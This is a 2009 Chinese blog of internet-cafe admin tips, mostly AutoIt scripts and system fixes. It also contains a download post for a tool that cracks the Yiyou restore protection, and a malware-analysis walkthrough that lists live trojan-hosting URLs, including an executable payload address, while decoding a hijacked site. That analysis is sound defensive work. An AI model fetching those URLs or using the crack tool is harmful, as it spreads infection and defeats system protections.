      问题现象：登陆QQ2009后，某些配置低些的机器会卡住1-3分钟，更严重的会程序假死（无响应），经分析发现是txopshow.exe引起的。
    说明：TXOPShow是腾讯新的迷你首页的广告进程。
    解决方法：用网维、易游==软件的将txopshow.exe加到危险进程，其他的可以用映像劫持技术禁止这广告程序启动。

PUBWIN服务器时间不对？

180045@163.com(毒药) — Sat,03 Oct 2009 17:48:22 +0800
      前几天接到上头通知，PUBWIN要升级成为2009的，为防止升级过程中出现什么差错，我干脆选择了全新安装（包括系统、SQL）等等，可等装后几天收银说少钱，那才发现开卡上机的时间与实际整整相差了八小时，进后台查看又没发现什么？？
    郁闷着找了下PUBWIN客服，一分钟后问题解决~
方法：
停止EP的数据服务
把系统时区调整到格林威制标准地球时间
去掉下夏令制点应用
然后再把时区改回北京的+8时区
点确定
OK

NND的，浪费电话费~早知道不用绿茶2003SP2版了，还好少钱这问题到不了我头上。

AU3批量修改易游用户磁盘

180045@163.com(毒药) — Sat,26 Sep 2009 04:39:19 +0800
那个....遍历.....不说了.困啊

复制内容到剪贴板程序代码

; 显示当前目录中所有文件的文件名
$search = FileFindFirstFile("*.ini")  ;放用户磁盘目录下就好了.不放的话就指定目录吧.

; 检查搜索是否成功
If $search = -1 Then
    MsgBox(0, "错误", "没有文件/目录匹配搜索")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    IniWrite( $file, "settings", "DefaultSize", "1048576000");这个是1000M

    WEnd

; 关闭搜索句柄
FileClose($search)

Recuva绿色汉化版

180045@163.com(毒药) — Fri,18 Sep 2009 03:15:43 +0800

      估计大家都曾遇到过自己不小心误删除了一些重要文件的经历吧？当听到回收站哗啦一声的“美妙声音”之后，大家的反应是如何的呢？呵呵，其实呢，即使已经清空了回收站，一般情况下，你的文件被找回来的机会还是不小的，X-Force就曾帮助好多朋友找回了重要的文件。如果你也是经常如此粗心，那么今天介绍的软件你可不要错过了。

      我们今天的主角叫Recuva，名字挺奇怪的吧？其实它的读音就是“Recover”。它是一款删除文件恢复工具，与之前介绍过的专业的文件恢复工具EasyRecovery相比，Recuva最大的特点就是体积小巧且完全免费了！只有几百KB的体积，放在U盘、网络硬盘等随时用于救急是非常不错的选择呢。

Recuva能做什么？

      Recuva可以为用户恢复任何电脑上被删除了的文件，甚至，就连U盘、数码相机、储存卡、MP3和移动硬盘等设备的文件也能够恢复。

Recuva为什么能恢复被我删除的文件？

      实际上，我们平时删除了一些文件，即使已经从回收站清空了，但其实它们并没有被真正删除了。通俗点来说，它们只是被Windows标上了一个“已删除”的标签，我们在Windows上不能再看到它们了。以后，当有新的文件被放进来，需要用到这些被打上删除记号的文件的空间时，它们就会被覆盖掉。这时这些被“删除”的文件才会真正的去见阎罗王。于是乎，我们伟大的人类发挥了一如既往的创造力，制造出了文件恢复软件，在被标记上“删除”记号的文件去见阎罗王前，硬把它给拉回尘世来，完美地完成了一件让世人觉得Impossible的事情。 (注：格式化其实原理也差不多)

      看完上面X-Force的如此山寨的解释之后，大家大概对恢复工具都有一个简单的认识了。Recuva和其他删除恢复工具类似，都是基于上述的条件来工作的。所以，它们的恢复成功率并不是100%的，如果你的文件被删除了，并且又往磁盘里写进了一些新的文件，刚好被Windows分配到你要恢复的文件的空间的话，那么，你大概只能哭去了……所以，X-Force在这里告诉大家，如果你误删除了某个文件、误格式化了某个分区，请千万不要再往那个分区写进任何东西，最好也把所有的后台程序都关闭，以防止某些程序会对文件进行读写，这样才能保证恢复的成功率。

Recuva的使用方法

       Recuva和其他的恢复软件在使用上的步骤均差不多。除了上面图片中非常易用的“向导模式”外，手动扫描恢复模式也是非常简单的哟！

扫描硬盘上被删除的文件

扫描结果，找到很多被删除掉的文件了！

1选中你想要恢复的文件；2单击恢复；3保存即可！

Recuva与其他恢复软件相比有什么不同？

      前面说过了，Recuva最大的特点就是免费且体积小巧。因为几乎所有专业的恢复工具都是商业软件，价格不是一般的贵，并不是每个人都愿意去花费的。虽然在天朝的大环境下，想要使用这些昂贵的软件其实易如反掌，但在平时的应用中，如果我们能找到一款能代替盗版的免费软件，X-Force还是建议大家尽量使用免费的呢。

      相比专业的恢复工具，Recuva的体积可以说是非常非常的小巧了！仅几百K的体积，可以放在任何地方随时备用。并且，它的界面比较简洁，速度也非常快，有着傻瓜式的向导操作，用户可以很快就能上手使用。

点击下载此文件

做母盘别忽略了这几个步骤(转)

180045@163.com(毒药) — Fri,18 Sep 2009 01:09:56 +0800
      第一个：摄像头驱动别忘记安装，把所有驱动安装完毕后装摄像头驱动，当然，你如果是无驱的，就不要装了。但是有一点想必新手好忘，就是驱动装了以后，最好把四个USB口都插一遍，有什么用呢？当然有用，你能保证你所有的机器摄像头口都插的同一个接口上吗？

      所以呢，你如果只插一个，那剩下的活够你累了。你可能说克完母盘，如果真出现弹出窗口，那时候装不也一样吗？是一样，可是要浪费你多少时间啊？而且装完还会多出来一个启动项，还得regedit RUN....DEL掉。麻烦不？所以记住摄像头驱动要机器浑身上下每个口都插一遍。这个偶发现不少有忘的喜```

      第二个：耳麦声音千万别不调。有的哥们装完声卡驱动后，直接把右下角的那个图标去掉就觉的OK了，继续装其他驱动。还没完呢，你把音量控制提高到上面，然后选择下麦克风的调节，别忘了把静音钩去掉。很多朋友都忘记这一步，到最后不得挨个改，或者找远程批处理调用之类的东西，虽然没一台台的去改累，但是也挺麻烦的。

      第三个：所有驱动别随便找个网站下载，最好去官方网站下载，比如NVDIA的显卡就去官方去下，ATI的可以直接去产品官方网站下载或者去驱动之家。这个切忌！还有昨天一哥们问我，声卡驱动提示我未通过微软认证，怎么办？我说凉拌，我说你的是RL系列的吧？他恩（貌似不清楚）这个可以省略，一般的声卡驱动提示这个，但不代表不能用。

      第四个：切记，做母盘养成一个好的安装顺序和做备份的习惯。首先装什么，然后装什么，自己脑子里应该有个思路。不要一味的去按照网上的去办。记得我第一次尝试做母盘的时候，就拿网上的教程去做，确实很多自己想不到的，教程上面有，但不一定完全。就像我刚才上面所说的那几条一样，有那个母盘教程说道了这几点？很少，起码我只见到过两个不同的母盘教程说到了。如果真的记不下来，别嫌麻烦，拿个笔拿张纸，每做一个步骤就记下来，（但你别刷新一下也记下来...那样太开玩笑了~忽忽``）然后做完，对照一下。再有就是装完母盘系统后做个备份，然后装完所有驱动后做个备份，然后装完所有补丁做个备份，然后装完所需软件做个备份，然后开始优化，直到最后作个最终的恢复景象。我的习惯，大家可以根据自己的适当调整。

      第五个：不要擅自改变顾客的使用习惯！每一个网吧都用自己固定的一批忠实的顾客，他们不畏艰险，不管事态如何变化、不管天气是下雨还是刮风，他们每天都要在自个网吧消磨一段时间。所以他们对网吧的系统相对来说要你这个做系统的熟的多。所以很多上网的一些习惯，他们慢慢就养成了，包括网吧的内在因素，当然这个不是我们说的话题。所以说，在做系统前，尽量保留顾客的一些使用上网习惯，尤其是一个系统不出问题一用用半年或者更长时间的。这条一定要注意，不要等克完系统，老顾客都喊：“这次的系统怎么这么差劲，以前有那个什么快捷进入什么的这次怎么没有了？”所以切忌！

       第六个：但凡做技术的都知道，网吧换系统是一个苦差事，就算你干了N年的网吧维护，你也不可能信心十足的说，我的系统保证100%没问题！但凡有自知之明的，谁也不敢开这个口，所以做一次系统要做到近乎完美是不可能的，那怎么样才能做到尽善尽美呢。我自个有个癖好就是，不轻易换系统，除非是万不得已，出现了很大程度上影响网吧的，必须得换。但做完母盘以后，我会按常理刻上10台20台机器，让一些经常来玩的顾客感受一下，提一些建议，尽量做到最全面。也有时候直接克完一批机器，让顾客用个几天时间，这几天的时间，该出的问题只要出现就好解决。

—————————————————————华丽的分割线（新加↓）—————————————
       第七个：优化要适可而止！
       到现在，网吧系统的安全与稳定、维护方便、更好的与顾客沟通才是一个网吧系统好坏的重要因素。举个简单的例子：在我出去有事需要在其他网吧上网的时候，我就发现很多网吧竟然把我的电脑、回收站、甚至把本地链接都给隐藏了。我只能一个个的调出来，而如果换成不知道的呢？喊网管吗？有些可能是技术或者维护者给做的，网管也不一定能解决。比如学生来这查找资料，你桌面没有回收站而误删的东西找不回来，或者是下载什么软件需要本地链接之类支持的组件，看不到，这完全不是一个让顾客使用的系统了，而是一个人的秀场而已.所以，我在做系统的时候，就把我的文档回收站都放在桌面上，为的就是这个看似不是优化之中的贴心优化。

       第八个：当你踏入另外一个网吧的时候，不要第一件事就拿系统开刀！
       每一个网吧有一个不同的系统，而每一个网吧都有一群固定的老顾客而每一个老顾客都有一个使用习惯。这样就谈到我上面所说的不要随意改变顾客的使用习惯了。细节的决定成败，在网吧不是危言耸听。举个简单的例子，一个网吧系统半年多没换了一直还不错，就拿输入法来说三个输入法第一个切换搜狗第二个切换五笔第三个切换智能或者其他。网吧的顾客都会慢慢的养成一个习惯就是当他切换第一个的时候他不用看右下角的图标就知道是搜狗输入法虽然这个过程很短暂，但试想你如果考虑过多装N个输入法其结果就是顾客切换N编还没找到自己喜欢的如何呢？简单的例子同样用到系统其它方面也是一样。所以，不管你技术如何，初来咋到一个网吧，想要留下好的印象，这个建议就是先麽熟网吧的系统各个方面，在脑海中有一个定位，然后规划出新的系统，既让顾客感觉到习惯依然，新系统又稳定快速安全。这样，你便OK了！


————————————————————华丽的分割线（新加↑）———————————————

       第九个（2009.09.01）：
       感谢有个朋友提醒，他疑惑的问我说，我做了很多次母盘可每次感觉东西装的太多开机慢或者是暂时开机很快等用了很长时间就慢了下来了呢？确实，我也曾碰到过这样的问题存在。我给这位朋友说，做母盘，期间会有安装常用软件的一个环节，软件安装的多少是和你自己的感觉还有网吧整体顾客需求去装的。打个比方说，你网吧有远古电影服务器，你能不装远古播放器吗？当然得装是不是！你网吧在学校周边，一些办公软件和图像处理之类的你能不装吗？必须得装的。可是有些可装可不装。我自己估摸着写了一个安装软件的清单，也许有些你没有装过或者有些你装过我却没装过但是不管怎样安装完下面这些，基本可以满足网吧顾客的需求了。
       办公设计类： OFFIC2003 除了那个OU邮件不装  其他最好全部装上、PHOTOSHOP、非主流或美图照片处理工具
       播放媒体类：
       最后，我经常说的一句话是：网吧系统适合自己的才是最好的。为什么这么说呢？自己在网吧每天没事可以多转转，看看上网的朋友们经常用什么，对什么不满意，需要什么，调查下就大体不差了。然后你就开始想装什么，最好找一些绿色的。句个例子，比如网吧在学校附近，你得装办公软件和PS等设计软件吧？不装，那你会失去的。还有就是不要把自己的桌面搞的跟VISTA一样！很多顾客对你的桌面只有一个要求，那就是一目了然就够了！搞那么复杂占用内存不说，也不见得顾客多赞赏。我要是顾客最多说一句，个性。但个性网吧不仅仅代表的是网吧好。知道不？

东拼西凑的[设备管理]

180045@163.com(毒药) — Wed,16 Sep 2009 23:35:02 +0800
        很是无聊的AU3程序，用于收集网吧设备信息，只是多客户端连接的处理还没做好，那啥二维数组还不是太会用。

点击下载此文件

AUTOIT应用之感悟

180045@163.com(毒药) — Tue,15 Sep 2009 05:34:16 +0800
      早在几年前从我第一次接触AUTOIT开始，我就已经深深被这脚本语言打动，也坚信它能采代VBS或批处理。确实，VBS的能做到的AUTOIT也能做到，但AUTOIT能做到的VBS却未必能做到，况且它没有批处理的繁琐，当中很多函数已封装好，我们需要去做的只是调用再调用。
      时至今日，AUTOIT的发展已大大超越其它脚本类语言，例如DLL的调用、多线程的模拟、GUI界面的成熟等等，它早已不是初期那只用来模拟键盘鼠标安装软件的阿蒙。但对于我自己，却一直停留在利用它来搞搞开机脚本之类的操作，某天上AUTOIT官方论坛游览，已然不认识新版本中的UDF函数，庆幸的是读一遍下来也懂得八九不离十，毕竟在校时也被逼学习过C、PASCAL这些我从来不想去懂的家伙：），伪coder。
      But……So what？够用就行……
      ……
      故事的结尾：笔者捧着新的帮助文档看了个通宵，左抄抄右抄抄的写了个小软后满足地进入了深度睡眠状态。


解决PJBLOG3的登录BUG(不能保存COOKIE)

180045@163.com(毒药) — Mon,14 Sep 2009 22:12:36 +0800
      升级PJBLOG3后一直在为这不能保存登陆信息而困扰，虽然PJBLOG论坛有文章写过解决办法，但看着也麻烦，改的东西多。今天终于在evio前辈的博客找到解决办法，两步即解决，挺方便的，转载到此方便需要的兄弟参考。
common/CACHE.ASP 查找：

复制内容到剪贴板程序代码
Response.Cookies(CookieName)("memRight") = StatusCode

在下面增加：
复制内容到剪贴板程序代码
If DateDiff("d",Date(),Request.Cookies(CookieName)("exp"))>0 Then

common/CHECKUSER.ASP 查找：
复制内容到剪贴板程序代码
If Request.Form("KeepLogin") = "1" Then Response.Cookies(CookieName).Expires = Date+365

一共两处全替换为：
复制内容到剪贴板程序代码
If Request.Form("KeepLogin") = "1" Then

QQ远程协助白屏问题

180045@163.com(毒药) — Mon,14 Sep 2009 21:51:32 +0800
      其实我碰上这问题已经是第二次了，上次因为是无心远程，也没放在心上，今次是在连回家中的电脑拉点东西时才发现问题和上次远程时的问题一模一样：QQ显示远程协助已连接，但屏幕空白一片。
      解决思路：换QQ版本、关闭被连接方防火墙——问题依旧，最后厚着脸皮问了下百度，原来是分辨率过大所导致。
      网吧分辨率：1680X1050
      家里的电脑：1920X1080
      狂汗！要不是知道自己用的是24'LCD，还真要在这问题上再兜N个圈子了。
    解决：将家里的电脑分辨率改成1024X768，OK了。
      后记：百度原来真的知道。

十个放弃博客的理由

180045@163.com(毒药) — Mon,14 Sep 2009 21:05:26 +0800
      当我准备提笔写坚持博客的十个理由时，我便列出了以下十个放弃博客的理由，当然，这一点也不奇怪，任何事物都是辨证的存在的。如果你的博客半死不活，那么你不如去看那篇十个坚持写博客的理由。如果你正准备写博客，并希望你的博客能给你带来明显收益的时候，那请你看这篇文章。

下面就看看十个放弃博客的理由、

一、博客已经落伍了。这是我想到的第一个理由。如果说网络只需要十年就可以遍及生活，那么博客也有五六年的历史了。如果你现在才想开博客，那只能说你落伍了。博客已经不流行了。

二、博客已经变质了。一些所谓的博客专家们正在欣喜的发表他们的看法，他们说，博客正渐渐着成为一个新的媒体。当然，如果你认为称呼博客为新的媒体是对博客的一种褒扬时，那么你错了。博客成了传播科技和新闻的媒体，这只能毁了博客。博客应该是表达自己的一种方式。

三、博客无法满足你的成名的需要。是的，不要逃避这一点，你确实是希望通过博客来满足你成名的需要。但很显然，现在写博客根本无法完成这一目标。你作为数以百万的博客之中的一员，就如沙漠中的沙子一样毫不显眼，因为显眼的只有钻石，你不是。

四、博客无法满足你补帖生活费的需要。博客赚钱的梦想，现在可以醒醒。无论你是广告，还是想通过买卖链接来赚钱，都只是镜花水月。真正赚钱的，既不是那些访问量超高的名人博客，也不是那拥有话言权的专家博客，而是那些介绍别人怎么通过博客赚钱的博客，这不是一个很有意思的现象吗？

五、你也满足不了大家的需要。我几乎每天都在一些网站学习如何SEO，如何赚钱，这也包括去一些比较有名的博客学习，很显然，提供这些内容的博客，或者网站是有用的。翻看一下你的博客，看看有多少对大家有用的东西，如果很少，那请你放弃博客吧，去论坛灌水能获得更多的快感。

六、博客没法满足你一呼百应的需要。当我在论坛上时，就很少灌水了。但如果我有一天偶然留下了一句两句话，我会在过段时间去看看是否有人对这句话发表看法。但如果我在某个博客上留了言，我根本懒得回头去看是否有回复。博客只有博客主人的回复。博客也不是重在互相交流的平台提供者。

七、博客占用了你很多的业余时间。当一个博客几天没有新的内容时，搜索就讨厌这儿了，可能下次就来得晚了点。当你知道自己的博客有几天没有新的内容出现时，你也会很烦燥，就一直想写点什么放上去，这几乎是每个博客人的通病，没办法，博客就是这样，你不写，就没有人会发表东西在你的博客上。当然了，我同样认为，为你的博客没有更新内容而烦燥的，只有你自己，而未必包括读者，这样子的博客，你还要坚持吗？

八、博客暴露了你的弱点。如果我不喜欢运动，我是决不会在博客述说这方面的内容。但如果我一直认为老舍是个科学家，我可能就会写在博客上。

九、在同样的投入下，博客的收益最少。当一个博客你写了两年以后，你会发现你还在原地不动，浏览量没有上去，收入也没有上去。回头看看，当你用两年的去做一个简单的网站，你会发现，这样一个简单的网站可能给你带来了一些收入。

十、不知道不觉就写到十了，其实我还有更多的理由，不过，如果有了以上的九条理由，你坚持写博客或者决定写博客的决定难道还没有支援吗？

母盘制作由零开始

180045@163.com(毒药) — Mon,14 Sep 2009 06:25:49 +0800
      本文综合了网上几个母盘制作流程的文章，再对其中一些事项加了注释或作删除处理，为的是给大家一个一目了然的感觉。搞了这么多年网吧，倒是觉得~~网吧的技术含量~反正我是没有过，一直只做一个会用软件的网吧从业人员而已，反之F8、老贼这些才称得上是为网吧作出具大贡献之人。
    再说回母盘的制作：现今绿茶、深度等集成系统一罗筐，倒是省了不少事，却也令新人失去了学习的兴趣。在我的理念之中，无论学习什么知识，基础一定要打好——哈哈，扯远了。

      其中的优化选项我觉得倒是没有必要，神七都快上太空了，现在的电脑跑个WINDOWS 7也爽歪歪的，只是那些个属性所对应的注册表路径知道个大概还是很好的，别只双击导入了事啊。
点击下载此文件

易游还原终结者

180045@163.com(毒药) — Fri,11 Sep 2009 05:47:01 +0800
       这个~~树大招风啊
       软件简介：
       易游还原破解的工具，clientset.exe是易游客户端的管理文件，只要能进入管理系统就可将还原破解。

            软件界面：


点击下载此文件

IE6必死

180045@163.com(毒药) — Wed,09 Sep 2009 23:15:48 +0800

        最近 Twitter 上很多人在推一个名为 IE6 Must Die 的活动, 参与的朋友可以通过头像转换服务在自己的头像上加上一个禁止 IE6 的图标, 很是拉风.

       Internet Explorer 6 是曾经浏览器的霸主, 击垮 Netscape 并最终占据 95% 的浏览器市场. 但如今已经功能性能落后, 还需要特殊照顾, 被称为阻碍网络技术向前发展的障碍.

        为了推动 IE6 的灭亡, NeoEase 即日起, 会为 IE6 用户进行更新提示, 提示信息会显示在页面的右下方, 每星期一次. 效果如右图所示.

IE6 为何不死?

        IE6 久久不离其位当然是有原因的, 根据网上资料与个人总结, 得出以下几点:

1. 普及时间长, 用户已经形成了使用习惯, 甚至形成以偏概全的认知. XP 的成功和长寿让 IE6 成为大家最熟悉的软件之一, 而且 2001 到现在正是网络发展最快速的几年, 很多用户一直只适用 IE6, 他们找不到 Internet Options 菜单项, 无法理解其他浏览器新奇的标签和工具, 甚至认为 IE6 就是网络.

2. 在 IE6 盛行几年间, 很多公司为了节约成本, 开发的应用系统只支持 IE6. 令人称奇的是现在还有很多企业继续生产这样的产品. 系统都做出来了, 现在去兼容吧, 不好意思, 合同没写, 加钱也未必做得到. 推倒重做吧, 不可能! 行, 那公司的所有电脑都必须使用 IE6.

3. 如果你有留意浏览器的市场占有率, 你会发现 IE 各版本的占有率和 Windows 的占有率成正比, 也就是说, 使用 Windows 系统的用户大部分都没有升级或者更换操作系统默认浏览器. Vista 的失败令 Windows XP 和 IE6 有更多的生存空间.

4. 还有一些顽固分子, 可能看着其他浏览器不顺眼或者觉得用旧东西比较酷 (我的某个朋友就经常吹捧他对 Windows 95 的熟悉).

5. 网页设计师和开发工程师, 他们是最大的受害者, 是最想摆脱 IE6 但又不能甩手放弃的.

IE6 为何该死?

        IE6 是网页开发人员的噩梦. 他们必须花很多时间和精力去照顾这个老家伙, 所以这帮人很想整死 IE6. 从开发的角度来看, IE6 很该死的.

1. PNG 是一种支持半透明通道的图片, 可以方便的用于设计网页, 制作叠层和其他复杂的页面效果, 但是 IE6 不支持. 用滤镜强行应付会导致浏览器占用超高资源, 并且得不到预想效果.

2. IE6 有自己一套标准的 CSS 样式, 必须写更多的代码去照顾它. (个人认为 IE7 在这方面比 IE6 更糟糕)

3. JavaScript 与 W3C 出入巨大, 连 DOM (Document Object Model) 都不一致, 调用资源的代码也与 W3C 有很大的出入, 程序员被迫在本来就很松散和复杂的 JS 代码上追加很多判断语句.

4. IE6 对于页面控件的处理与众不同, 令人很头痛. 如: select element 的优先度很高会遮挡页面上 DIV 块, 必须 hack. radio 按钮和 checkbox 按钮的样式也无法定义, 很难统一页面风格.

另外, IE6 的安全性, 性能, 功能明显地已经满足不了现在的网络需求. 过两年, 能不能用来上 "饭否" 都难说. 更换浏览器是大势所趋.

加速 IE6 的灭亡

        HTML5 筹备已久, Windows 7 呼之欲出, 这是一个消灭 IE6 的好机会. 很多网站纷纷向用户发送更新提示, 希望用户可以升级或者更换浏览器. 还有些网站已经完全不支持 IE6, 要求其访客更换浏览器.

前几天看到一篇文章, 题目好像是 "前端开发人员能支持 IE6 比较牛, 还是拒绝支持 IE6 的比较牛?" 前者认为用户需要尊重, 后者认为兼容是延缓 IE6 灭亡的主要原因. 不管你如何认为, 哪个更牛并无关要, 重要的是尽己所能把 IE6 推下悬崖.

        什么?! 你还用 IE6? 换了吧! 我已经将本站使用的提示框做成了一个 Widget, 你可以简单地在上添加以下代码将它添加到你的网页上.

关于 Let's kill IE6 控件更详细的信息请查看以下页面:
http://www.neoease.com/lets-kill-ie6/

基于PJblog的RSS插件

180045@163.com(毒药) — Wed,09 Sep 2009 16:17:45 +0800
      这个插件不是别人订阅你的网站，而是你去订阅别人的网站。闲话少说，上图：

插件说明：
Name:RssLinkForPJBlog
作者:hiswing
Time:2006-6-12
URL:http://www.mxjava.com

安装方法：

1. 把文件夹RssBlog上传到博客的插件目录(Plugins)下
2. 登陆后台，执行插件的安装与管理
3. 插件显示：顶部"界面与插件"--"设置模块"--再把"博客手拉手"项选中调整位置，保存即可

效果本页侧栏所示。
点击下载此文件

关于自动改IP计算机名的延伸

180045@163.com(毒药) — Thu,03 Sep 2009 03:24:06 +0800
      自动改IP和计算机名的软件相信大家也不陌生了，但在网吧实际应用起来时，通常会因为某机器主板更换或替换网卡的原因而需要手动去操作。因为软件也只是依靠MAC配置文件来更改，而MAC配置文件是与程序放在同一目录下，原理说白了都一样，其实转个角度去想，把配置文件放共享服务器也未尝不可~
      下面说的只是一个思路，希望可以帮到大家：
      1、在电影服务器或其它服务器的网卡上添加一个IP地址，我在这里取100.1.1.1,掩码为255.0.0.0
      2、新建一个共享目录，将MAC配置文件放目录内，这里取\\100.1.1.1\mac\
      3、SCRIPT CODE
复制内容到剪贴板程序代码
#include
_RunDOS('netsh interface ip set address name="本地连接" source=static addr=100.1.1.2 mask=255.0.0.0')  ;用netsh的方式更改客户机IP为100.1.1.2
;==============下面这段就是网上流传广泛的批处理，那个\桌面\自动安装\是我存放脚本的路径
_RunDOS("ipconfig /all >c:\docume~1\admini~1\桌面\自动安装\ipconfig.txt")
_RunDOS('find "Physical Address" c:\docume~1\admini~1\桌面\自动安装\ipconfig.txt >c:\docume~1\admini~1\桌面\自动安装\phyaddr.txt')
FileOpen("C:\Documents and Settings\Administrator\桌面\自动安装\phyaddr.txt", 0)
$line = FileReadLine("C:\Documents and Settings\Administrator\桌面\自动安装\phyaddr.txt", 3)
$mac = StringRight($line, 17)
MsgBox(32, "本地MAC地址是", $mac, 2) ;提取客户机网卡的MAC地址到变量$mac
FileClose("C:\Documents and Settings\Administrator\桌面\自动安装\phyaddr.txt")

复制内容到剪贴板程序代码
$file = FileOpen("\\100.1.1.1\mac\mac.txt", 0) ;打开共享目录中的MAC配置文件
If $file = -1 Then  ;找不到共享文件则退出
    MsgBox(0, "Error", "Unable to open file.")
    Exit
EndIf

复制内容到剪贴板程序代码
for $i = 1 to 255 Step 1 ;为方便阅读只取一个IP段
    $line1 = FileReadLine($file, $i)
                  If StringRight($line1, 17) = $mac Then
    MsgBox(0, "对应机号是", $i, 2)  ;这里是我根据MAC地址存放的行来确定IP地址
;=============无悬念的NETSH方式更改IP、注册表更改计算机名===============
Select
    Case $i < 10
              _RunDOS('netsh interface ip set address name="本地连接" source=static addr=192.168.0.' & $i & ' mask=255.255.255.0')
    RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ComputerName", "ComputerName", "REG_SZ", '00' & $i)
    RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName", "ComputerName", "REG_SZ", '00' & $i)
    RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters", "NV Hostname", "REG_SZ", '00' & $i)
    RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters", "Hostname", "REG_SZ", '00' & $i)
    RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\ComputerName\ComputerName", "ComputerName", "REG_SZ", '00' & $i)
    RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\Parameters", "NV Hostname", "REG_SZ", '00' & $i)
    RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\Parameters", "Hostname", "REG_SZ", '00' & $i)
               Case $i >= 10 And $i < 100
.........................
.........................
.........................
EndSelect
    EndIf
Next

复制内容到剪贴板程序代码
;                   ========创建删除安装目录批处理==========
FileOpen("C:\Documents and Settings\Administrator\桌面\AUTODEL.bat", 10)
FileWriteLine("C:\Documents and Settings\Administrator\桌面\AUTODEL.bat", "rd /s /q c:\docume~1\admini~1\桌面\自动安装")
FileWriteLine("C:\Documents and Settings\Administrator\桌面\AUTODEL.bat", "del %0")
FileClose("C:\Documents and Settings\Administrator\桌面\AUTODEL.bat")
RunWait(@ComSpec & " /k " & "ipconfig -all")  ;运行CMD打开IP配置 /K：不关闭DOS窗口
;这里还可以加入其它的东西，例如重启、将创建的批处理添加进启动注册表等，不提

     附：用NETSH的缺点是网络连接在网吧中名称必须统一，用WMI方式就比较好。另外也不提但是母盘IP先改为100.1.1.2（以上述脚本为例），因为网络克隆必会导致IP冲突，若不怕麻烦的话可以搞IP后3段的伪随机，呵呵~

FreShow(网马分析)实例

180045@163.com(毒药) — Sat,15 Aug 2009 01:46:51 +0800
一般来说，网马解密的工具基本就是 Freshow、Redoce与Malzilla，今天我们在这里简单体验一下Freshow的强大功能。

引用内容
freshow工具使用的详细注释如下：
1.URL：要解密的网址地址
2.Check：用来获取要解密网址的源代码(此工具要在联网状态下使用)
3.上操作区域：获取到的网站源代码在此处显示
4.C：清除代码，用来清除上操作区域和下操作区域的代码
5.P：是复制代码
6.Filter：过滤网页源代码中的js、iframe、script链接
7.Decoder：解密按钮，用来解密加密的网页源代码
8.过滤选项：
Qeye：过滤网页源代码中潜在的恶意链接，如：iframe、script结果会显示在收集区域；
Connect：连接字符串，如‘a+b’，使其变为：ab；
Nuls：过滤空字符串，使得脚本更容易阅读；
Replace：替换字符串；
Reverse：逆转字符，一些特殊的脚本采用这种方式。
解密选项：
9.Esc：可以转换%、%u、\x等形式的转义字符，\x可以再操作异或，如果知道确切的值，就在附加区域里输入它，或者使用枚举异或enumXOR，会自动处理并返回结果；
ASCII：可以转换“1,2,3”形式的ASC码，分割符可以覆盖；
US-ASCII ：代码类似汉字，且代码中包含有：
Alpha2：这个算法针对在Replayer的漏洞利用上，首先转换到\x形式，因为可能会经过异或操作；
enumXOR：对十六进制的数据进行枚举异或，并返回结果；
Base64：这种加密方式很少见，加密特征大小写字母及数字混排，末尾可能包含等号；
Winwebmail:网马加密代码中有类似：document.write(unencode(webmm,3422));代码(至今未见过此类加密方式，这个不确定)
10.密钥 (目前主要ie7.0漏洞的解密需要密钥)
11.UP:将下操作区域的内容翻转到上操作区域进行二次解密
12.上选择按钮：对上操作区域代码进行清空或复制
13.下选择按钮：对下操作区域代码进行清空或复制
14.下操作区域：解密出网马结果显示在此处
15.收集区域：由Qeye筛选出的恶意链接被罗列在这里，可以通过上移、下移、删除、全选等操作。当选中其中一个链接时，自动处理为新的URL，这时可以check得到新的源代码，显示在上操作区域，可继续解密
16.ALL: 勾选所有收集区域的地址
17.Del：删除不需要的链接
18.上移按钮：将恶意链接地址进行上移操作
19.下移按钮：将恶意链接地址进行下移操作
20.Log：自动将选择项复制到剪切板并做一定的格式化处理，方便直接在论坛或其他地方与他人共享分析结果
21.Download：将选择的网马地址复制到剪切板，并下载相应的网马(例如：迅雷、flashget开启状态下，并设置了监视相应的文件类型，此时点击download按钮就会调出默认的下载工具下载网马。)
22.Obj：目标插入区域，将最终解密出来的网马地址，复制到obj区域，并按Insert插入，它将会被自动插入到之前选中的链接后，作为子级
23.Insert：插入网马链接地址
24.State：连接状态，可通过连接状态来判断网址是否失效

首先，我们选取一个被挂马的网站，就以http://www.qfans.net/love/1/love_qs/love.htm为例吧，打开Freshow输入网址，点击连接

加载完成后，再点[过滤]，于是我们就得到了右面的2个网址

我们细心看看http://dsa33dcx.3322.org/ok/03.htm这个网址的类型框架，不用想就是它，点击连接，再得到如下图

再次[过滤]，右面又多了两个网址，重复操作，连接后如下图所示

到了这一步，答案就呼之欲出了，[过滤]http://ddssxe232.9966.org/ok/ganiniang360.html得到以下三个网址
http://ddssxe232.9966.org/ok/FireFox.htm
http://ddssxe232.9966.org/ok/gfddtt.htm
http://ddssxe232.9966.org/ok/qqlove.htm
我们随便打开一个，得到go.jpg和go1.jpg，这个就是我们要找的东西。

小心的加载一下go.jpg，哇靠~！咋的一堆乱码。这时候FreShow就开始发挥它强大的功能了

按一下ESC解码，是不是发现代码已经转换了？

但怎么还是一堆加密字符？？不用着急，我们在这个基础上点击一下向上按钮将转换后的代码移上去，再次按ESC解码

得到http://1123886.3322.org/alg.exe，网马地址终于显露原形。
go1.jpg看了一下，是一段引发微软DirectShow MPEG-2视频0day漏洞的JS，而上面的go.jpg则是SHELLCODE。
http://ddssxe232.9966.org/ok/qqlove.htm是利用OFFICE 0day漏洞挂的马，有兴趣的可以小试牛刀。

点击下载此文件

N久前的几个小脚本

180045@163.com(毒药) — Thu,30 Jul 2009 05:33:30 +0800
1、批量生成SMIL
出处：很久之前用的零度白茶影院，我采用了共享播放，但是若在后台电影路径中输入如：\\192.168.0.x\e\1.rmvb这样子影片路径，客户机播放时要卡最少30秒播放器才会调用成功。后来想到SMIL的方式,后台路径改为如：\\192.168.0.x\e\1.smil，smil文件内容就填上file:///\\192.168.89.20\e\1.rmvb，测试后影片无延迟播放。
